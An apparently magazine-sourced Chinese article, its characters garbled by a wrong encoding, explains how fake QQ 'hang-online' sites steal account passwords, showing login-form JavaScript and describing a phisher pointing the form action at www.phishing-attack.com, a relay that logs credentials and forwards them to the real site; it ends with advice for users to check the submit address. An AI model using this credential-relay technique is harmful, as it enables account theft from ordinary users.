不知道從什么時(shí)候開(kāi)始網(wǎng)絡(luò)上就開(kāi)始興起了掛QQ 的風(fēng)潮,誰(shuí)都為了騰訊所謂的等級(jí)在不斷的掛Q 掛Q,就連掛著QQ 拿個(gè)等級(jí)有啥作用也不知道的人,看著別人有自己沒(méi)有就感覺(jué)特不爽,所以慢慢的掛Q成為了一種時(shí)尚,也成為了一種新的業(yè)務(wù).網(wǎng)上各種各類(lèi)的掛QQ網(wǎng)站層出不窮,而且沒(méi)有絲毫的減少,但是有沒(méi)有人去懷疑你所使用的掛QQ 網(wǎng)站是不是真的安全了?
為了保護(hù)作者以及雜志社本身請(qǐng)大家看完”免責(zé)聲明”后方可閱讀.
免責(zé)聲明:
作者無(wú)法鑒別判斷讀者閱讀本文后的用途,如果讀者在閱讀本文后違反國(guó)家法律規(guī)定而出現(xiàn)的糾紛與及不良結(jié)果,由行為人獨(dú)立承擔(dān)所有責(zé)任,本文的作者以及刊登該文章的雜志社均不負(fù)責(zé)也不承擔(dān)任何法律責(zé)任。
現(xiàn)在盜取任何聊天軟件的號(hào)碼,不外乎就是利用盜號(hào)軟件以及鍵盤(pán)記錄軟件記錄被種植主機(jī)的賬號(hào)以及密碼,這種累贅而又需要多方軟件支持的手法已經(jīng)過(guò)時(shí)了,而現(xiàn)在行之有效的就是利用無(wú)污染(不需要軟件以及任何病毒)去進(jìn)行的盜取賬號(hào)密碼的網(wǎng)絡(luò)釣魚(yú)攻擊,網(wǎng)絡(luò)釣魚(yú)已經(jīng)變成了黑客以及一些不法分子用來(lái)進(jìn)行銀行賬號(hào)以及等等相關(guān)敏感信息盜取的最有效最快速的途徑,而我們也可以利用網(wǎng)絡(luò)釣魚(yú)在一夜之間擁有成千上萬(wàn)的QQ 號(hào)以及密碼(甚至于QQ 密保信息).首先釣魚(yú)者本身是會(huì)仿冒一個(gè)掛QQ 的網(wǎng)站頁(yè)面,因?yàn)橐率乖L問(wèn)者可以相信,所以在仿冒會(huì)根據(jù)時(shí)下最多人訪問(wèn)的掛QQ 網(wǎng)站進(jìn)行設(shè)計(jì)(如圖1.)
仿冒好一個(gè)虛假的網(wǎng)站之后,釣魚(yú)者本身會(huì)想辦法如何去保存所釣到的資料,通常在釣魚(yú)網(wǎng)站中都會(huì)采取本地記錄相關(guān)資料,但是整個(gè)用戶的使用流程就會(huì)在輸入賬號(hào)以及密碼后出現(xiàn)問(wèn)題,就是說(shuō)釣魚(yú)者自身會(huì)想個(gè)借口出來(lái)說(shuō):”該系統(tǒng)因系統(tǒng)繁忙,暫時(shí)無(wú)法為你服務(wù)!”等等的理由,讓被釣者信服,但是現(xiàn)在作為被釣者本身已經(jīng)不再這么的愚蠢,所以傳統(tǒng)的釣魚(yú)模式已經(jīng)無(wú)法行得通.為了可以使被釣者整個(gè)使用流程不會(huì)出現(xiàn)任何的懷疑,所以釣魚(yú)者會(huì)在提交處做一定的手腳.讓我們看看例子:
}
function Login()
{window.open("about:blank","qqLogin",
"width=400,height=300,resizable=no,scrollbars=no,status=no,toolbar=no,menubar=no,location=n
o");
document.QQForm.target = "qqLogin";
document.QQForm.action = "login.asp";
document.QQForm.submit();
} 因?yàn)槠P(guān)系刪除多余語(yǔ)句
從上面的代碼我們可以看到,這是一個(gè)正常掛Q網(wǎng)站的登錄頁(yè)面代碼,當(dāng)用戶訪問(wèn)網(wǎng)站的時(shí)候,輸入的賬號(hào)以及密碼就會(huì)提交給login.asp 頁(yè)面,然后再轉(zhuǎn)去掛Q系統(tǒng).如果作為釣魚(yú)者本身想完美的結(jié)合真實(shí)的掛Q 網(wǎng)站去完成整個(gè)操作流程,那樣子他就必須在這個(gè)提交頁(yè)面做一些修改,使到被釣者的信息先存儲(chǔ)在自定的地方,然后再轉(zhuǎn)發(fā)到真實(shí)的掛Q 網(wǎng)站,所以釣魚(yú)者會(huì)有可能的把代碼提交的語(yǔ)句修改為:
document.QQForm.action = "
在這里我們可以看到釣魚(yú)者把提交的數(shù)據(jù)轉(zhuǎn)發(fā)過(guò)去了www.phishing-attack.com的網(wǎng)站,為了避免數(shù)據(jù)會(huì)被發(fā)現(xiàn),所以釣魚(yú)者利用中間站記錄用戶所提交的信息.可能大家會(huì)問(wèn)到那整個(gè)釣魚(yú)過(guò)程是怎么樣的了?我給一個(gè)比較簡(jiǎn)單的過(guò)程大家看看
釣魚(yú)網(wǎng)站--------------中間記錄站----------------真實(shí)掛Q網(wǎng)站
當(dāng)用戶訪問(wèn)的時(shí)候,會(huì)將密碼提交給釣魚(yú)網(wǎng)站,釣魚(yú)網(wǎng)站會(huì)把數(shù)據(jù)轉(zhuǎn)去中間記錄站,然后在中間記錄站進(jìn)行數(shù)據(jù)的保存,再次將用戶所提交的數(shù)據(jù)提交給真實(shí)的掛Q網(wǎng)站,這樣子在過(guò)程中用戶不單止可以完成整個(gè)操作的流程,并且釣魚(yú)者本身可以記錄密碼信息延長(zhǎng)整個(gè)釣魚(yú)網(wǎng)站的生命周期(作者注:通常釣魚(yú)網(wǎng)站自身的生命周期為15 天).整個(gè)思路就是如此了,然而中間站的作用是為了保存信息以及保護(hù)信息的安全性,不必?fù)?dān)心當(dāng)虛假網(wǎng)站被發(fā)現(xiàn)時(shí),所保存的數(shù)據(jù)會(huì)被發(fā)現(xiàn),通常這些作為中間站的網(wǎng)站都是釣魚(yú)者的傀儡,有可能是被入侵后的,或者利用免費(fèi)空間或者是只有7 天試用的測(cè)試空間作為臨時(shí)的中轉(zhuǎn).
本文在此就把整個(gè)釣魚(yú)網(wǎng)站的過(guò)程說(shuō)清楚了,因?yàn)閮?nèi)容有一定的危害性,所以把中間站以及真實(shí)站之間的技術(shù)問(wèn)題都屏蔽了,大家在使用掛Q網(wǎng)站的時(shí)候,請(qǐng)多留心注意一下掛Q網(wǎng)站的首頁(yè)源碼,看看提交處的地址和你所使用的網(wǎng)站地址是否一致,如果是一致的話,也不用這么高興,如果釣魚(yú)者本身是在本地記住你的信息,那樣子你還是一樣躲不過(guò)被釣的威脅,QQ 等級(jí)是否真的比你的號(hào)碼還重要,如果你覺(jué)得還是等級(jí)重要的話,你可以放心的去掛你的QQ,我和玄貓有一句話送給大家:”平平安安網(wǎng)站掛,哭哭啼啼QQ 丟”.請(qǐng)大家看清楚相關(guān)的利弊關(guān)系別麻木的去相信所謂的掛QQ 網(wǎng)站!本文到此結(jié)束